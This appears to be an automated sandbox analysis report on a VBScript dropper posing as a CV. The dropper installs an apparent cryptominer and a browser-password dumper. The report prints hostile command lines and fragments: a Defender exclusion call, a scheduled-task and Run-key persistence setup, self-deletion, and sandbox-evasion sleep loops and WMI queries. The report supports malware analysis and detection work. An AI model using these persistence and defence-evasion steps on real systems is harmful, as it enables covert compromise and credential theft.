                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5980:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5704:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_01
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie_(1).vbs"
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: .pdbo` source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, go.exe.13.dr
                    Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.dr
                    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.13.dr

                    Data Obfuscation

                    barindex
                    VBScript performs obfuscated calls to suspicious functions
                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("wscript.exe", ""C:\Users\user\Desktop\curriculum_", "", "runas", "1");
                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("C:\Users\Public\computer_7", "true");IFileSystem3.FileExists("C:\Users\Public\computer_7");IFileSystem3.FileExists("C:\Users\Public\computer_7");IFileSystem3.OpenTextFile("C:\Users\Public\mutex", "2", "true");IShellDispatch6.ShellExecute("cmd.exe", "/c powershell -C "Add-MpPreference -Exc", "", "runas", "0");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");IHost.Sleep("1");I
                    Source: 7zr[1].exe.5.drStatic PE information: section name: .sxdata
                    Source: 7g.exe.5.drStatic PE information: section name: .sxdata
                    Source: mservice.exe.13.drStatic PE information: section name: _RANDOMX
                    Source: mservice.exe.13.drStatic PE information: section name: _TEXT_CN
                    Source: mservice.exe.13.drStatic PE information: section name: _TEXT_CN
                    Source: mservice.exe.13.drStatic PE information: section name: _RDATA
                    Source: C:\Users\Public\7g.exeCode function: 13_2_00B4A7BC GetCurrentProcess,GetProcessTimes,fputs,memset,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,__aulldiv,fputs,fputs,__aulldiv,__aulldiv,fputs,13_2_00B4A7BC
                    Source: 7zr[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9999c
                    Source: mservice.exe.13.drStatic PE information: real checksum: 0x496ae1 should be: 0x48da3c
                    Source: 7g.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9999c
                    Source: go.exe.13.drStatic PE information: real checksum: 0x0 should be: 0x3e524
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1

                    Persistence and Installation Behavior

                    barindex
                    Sample is not signed and drops a device driver
                    Source: C:\Users\Public\7g.exeFile created: C:\Users\Public\WindowsUpdate\WinRing0x64.sysJump to behavior
                    Source: C:\Users\Public\7g.exeFile created: C:\Users\Public\WindowsUpdate\mservice.exeJump to dropped file
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\7zr[1].exeJump to dropped file
                    Source: C:\Users\Public\7g.exeFile created: C:\Users\Public\WindowsUpdate\WinRing0x64.sysJump to dropped file
                    Source: C:\Users\Public\7g.exeFile created: C:\Users\Public\WindowsUpdate\ps.exeJump to dropped file
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\Public\7g.exeJump to dropped file
                    Source: C:\Users\Public\7g.exeFile created: C:\Users\Public\WindowsUpdate\go.exeJump to dropped file
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\Public\7g.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops PE files to the user root directory
                    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\Public\7g.exeJump to dropped file
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
                    Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media ServiceJump to behavior
                    Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Media ServiceJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Deletes itself after installation
                    Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\curriculum_vitae-copie_(1).vbsJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\WindowsUpdate\mservice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Potential evasive VBS script found (sleep loop)
                    Source: C:\Users\Public\7g.exeDropped file: Do Until .NameSpace(zipFile).Items.Count = _ WScript.Sleep 1000 Jump to dropped file
                    Source: C:\Users\Public\7g.exeDropped file: do while 1 wscript.sleep(10000)Jump to dropped file
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Users\Public\WindowsUpdate\mservice.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Queries sensitive share information (via WMI, WIN32_SHARE, often done to detect sandboxes)
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
                    Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
                    Queries sensitive share information (via WMI, Win32_Share, often done to detect virtual machines)
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep count: 9312 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Users\Public\WindowsUpdate\mservice.exe TID: 6328Thread sleep time: -199640s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\Public\WindowsUpdate\mservice.exeLast function: Thread delayed
                    Source: C:\Users\Public\7g.exeDropped PE file which has not been started: C:\Users\Public\WindowsUpdate\WinRing0x64.sysJump to dropped file
                    Source: C:\Users\Public\7g.exeDropped PE file which has not been started: C:\Users\Public\WindowsUpdate\ps.exeJump to dropped file
                    Source: C:\Users\Public\7g.exeDropped PE file which has not been started: C:\Users\Public\WindowsUpdate\go.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9312Jump to behavior
                    Source: C:\Users\Public\WindowsUpdate\mservice.exeWindow / User API: threadDelayed 9982Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
